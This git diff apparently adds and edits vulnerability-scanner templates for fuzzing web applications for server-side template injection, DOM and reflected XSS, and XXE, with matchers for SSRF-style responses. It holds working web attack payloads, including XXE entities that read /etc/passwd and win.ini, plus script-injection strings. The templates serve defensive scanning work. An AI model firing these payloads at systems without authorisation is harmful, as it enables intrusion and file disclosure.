+ words: + - "Interactsh Server" + + - type: regex + part: body + regex: + - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' + + - type: regex + part: body + regex: + - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' + + - type: regex + part: body + regex: + - '(\d.\d.\d)(.*?)mysql_native_password' + + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - 'dns-conf\/[\s\S]+instance\/' + + - type: regex + part: body + regex: + - 'app-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'ami-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'id[\s\S]+interfaces\/' diff --git a/http/fuzzing/dast/ssti/reflection-ssti.yaml b/http/fuzzing/dast/ssti/reflection-ssti.yaml new file mode 100644 index 0000000000..2c4424afbf --- /dev/null +++ b/http/fuzzing/dast/ssti/reflection-ssti.yaml @@ -0,0 +1,51 @@ +id: reflection-ssti + +info: + name: Reflected SSTI Arithmetic Based + author: pdteam + severity: medium + reference: + - https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java + - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update + tags: ssti,dast,fuzz + +variables: + first: "{{rand_int(1000, 9999)}}" + second: "{{rand_int(1000, 9999)}}" + result: "{{to_number(first)*to_number(second)}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + skip-variables-check: true + payloads: + ssti: + - '{{concat("${", "{{first}}*{{second}}", "}")}}' + - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' + - '{{concat("<%=", "{{first}}*{{second}}", "%>")}}' + - '{{concat("{", "{{first}}*{{second}}", "}")}}' + - '{{concat("{{{", "{{first}}*{{second}}", "}}}")}}' + - '{{concat("${{", "{{first}}*{{second}}", "}}")}}' + - '{{concat("#{", "{{first}}*{{second}}", "}")}}' + - '{{concat("[[", "{{first}}*{{second}}", "]]")}}' + - '{{concat("{{=", "{{first}}*{{second}}", "}}")}}' + - '{{concat("[[${", "{{first}}*{{second}}", "}]]")}}' + - '{{concat("${xyz|", "{{first}}*{{second}}", "}")}}' + - '{{concat("#set($x=", "{{first}}*{{second}}", ")${x}")}}' + - '{{concat("@(", "{{first}}*{{second}}", ")")}}' + - '{{concat("{@", "{{first}}*{{second}}", "}")}}' + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{ssti}}" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "{{result}}" diff --git a/http/fuzzing/dast/xss/dom-xss.yaml b/http/fuzzing/dast/xss/dom-xss.yaml new file mode 100644 index 0000000000..c8fc864ff3 --- /dev/null +++ b/http/fuzzing/dast/xss/dom-xss.yaml @@ -0,0 +1,45 @@ +id: dom-xss + +info: + name: DOM Cross Site Scripting + author: theamanrawat + severity: medium + tags: xss,dom,dast,fuzz + +variables: + num: "{{rand_int(10000, 99999)}}" + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + - action: waitload + + payloads: + reflection: + - "'\">

{{num}}

" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

{{num}}

" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/fuzzing/dast/xss/reflected-xss.yaml b/http/fuzzing/dast/xss/reflected-xss.yaml new file mode 100644 index 0000000000..c46ea8d3bb --- /dev/null +++ b/http/fuzzing/dast/xss/reflected-xss.yaml @@ -0,0 +1,39 @@ +id: reflected-xss + +info: + name: Reflected Cross Site Scripting + author: pdteam + severity: medium + tags: xss,rxss,dast,fuzz + +variables: + first: "{{rand_int(10000, 99999)}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + reflection: + - "'\"><{{first}}" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{reflection}}" + + - type: word + part: header + words: + - "text/html" diff --git a/http/fuzzing/dast/xxe/fuzz-xxe.yaml b/http/fuzzing/dast/xxe/fuzz-xxe.yaml new file mode 100644 index 0000000000..00ecca6669 --- /dev/null +++ b/http/fuzzing/dast/xxe/fuzz-xxe.yaml @@ -0,0 +1,50 @@ +id: fuzz-xxe + +info: + name: XXE Fuzzing + author: pwnhxl + severity: medium + reference: + - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + tags: dast,xxe,fuzz + +variables: + rletter: "{{rand_base(6,'abc')}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + xxe: + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + + fuzzing: + - part: query + keys-regex: + - "(.*?)xml(.*?)" + fuzz: + - "{{xxe}}" + + - part: query + values: + - "(" + fuzz: + - "{{xxe}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + name: linux + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + name: windows + part: body + words: + - 'for 16-bit app support' \ No newline at end of file diff --git a/http/vulnerabilities/generic/xss-fuzz.yaml b/http/vulnerabilities/generic/xss-fuzz.yaml index 4e0291ab94..bfdc836c0f 100644 --- a/http/vulnerabilities/generic/xss-fuzz.yaml +++ b/http/vulnerabilities/generic/xss-fuzz.yaml @@ -3,49 +3,52 @@ id: xss-fuzz info: name: Fuzzing Parameters - Cross-Site Scripting author: kazet - severity: high - description: Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests. + severity: medium + description: | + Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests. classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 cwe-id: CWE-79 metadata: max-request: 29 parameters: "q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year" - tags: xss,generic,fuzz + tags: xss,generic http: - method: GET path: - - "{{BaseURL}}/?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E" - - "{{BaseURL}}/?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E" - - "{{BaseURL}}/?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E" - - "{{BaseURL}}/?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E" - - "{{BaseURL}}/?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E" - - "{{BaseURL}}/?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E" - - "{{BaseURL}}/?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E" - - "{{BaseURL}}/?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E" - - "{{BaseURL}}/?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E" - - "{{BaseURL}}/?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E" - - "{{BaseURL}}/?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E" - - "{{BaseURL}}/?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E" - - "{{BaseURL}}/?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E" - - "{{BaseURL}}/?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E" - - "{{BaseURL}}/?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E" - - "{{BaseURL}}/?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E" - - "{{BaseURL}}/?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E" - - "{{BaseURL}}/?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E" - - "{{BaseURL}}/?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E" - - 